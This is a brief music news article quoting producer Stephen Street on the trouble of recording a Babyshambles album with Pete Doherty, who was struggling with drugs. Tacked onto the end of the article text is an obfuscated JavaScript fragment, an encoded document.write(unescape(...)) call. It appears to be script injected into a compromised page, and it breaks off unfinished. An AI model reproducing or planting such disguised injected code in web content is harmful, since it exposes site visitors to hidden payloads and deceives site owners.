Stephen Street has spoken about the difficulties of recording the new Babyshambles album with Pete Doherty.
The producer, famed for his work with The Smiths and Blur, manned the desk for the band's currently untitled new record, their first with a major label.
He has revealed that Doherty's renowned problems with drugs caused many problems in the studio as they looked to complete the follow-up to 2005's "Down In Albion".
"Pete wasn't in a very good state for the first couple of weeks of making the record for the reasons that people know about. It was a bit worrying to be honest with you", admitted Street.
"There were a couple of times I had to fire warning shots across his bow, say 'Listen, you've got to sort yourself out here because if you don't I can't work with you'.
"I felt like I was going to let down the rest of the band if I walked away from things", he told the NME.
However, Street described Doherty, who was yesterday given a month to quit drugs or face prison by a London judge, as "a very sharp, well-read, artistic person".
In the interview, he concluded: "I wanted to prove to those people that he can make a decent record."
The new Babyshambles album is due for release in September.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
